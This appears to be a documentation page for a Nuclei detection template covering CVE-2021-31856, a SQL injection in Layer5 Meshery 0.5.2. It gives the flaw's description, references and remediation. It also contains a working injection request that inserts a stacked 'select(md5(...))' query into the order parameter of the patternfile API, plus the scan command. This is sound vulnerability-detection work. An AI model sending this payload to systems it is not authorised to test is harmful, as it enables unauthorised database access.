Layer5 Meshery 0.5.2 - SQL Injection
ID: CVE-2021-31856
Severity: critical
Author: princechaddha
Tags: cve2021,cve,sqli,layer5
Description
Section titled “Description”Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
YAML Source
Section titled “YAML Source”id: CVE-2021-31856
info: name: Layer5 Meshery 0.5.2 - SQL Injection author: princechaddha severity: critical description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856). reference: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 - https://meshery.io - https://github.com/layer5io/meshery/pull/2745 - https://github.com/ssst0n3/my_vulnerabilities classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-31856 cwe-id: CWE-89 epss-score: 0.03274 epss-percentile: 0.91056 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: layer5 product: meshery tags: cve2021,cve,sqli,layer5variables: num: "999999999"
http: - method: GET path: - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}'
- type: status status: - 200# digest: 4b0a00483046022100dc24b7b8c9a02edd77d99e064bdc7ac116528ed4c2f244ce785713d859aac2840221008896cb4510f2537bc98a17b645228cbf28cecb64480e9a34ba02c71dc563dc22:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-31856.yaml"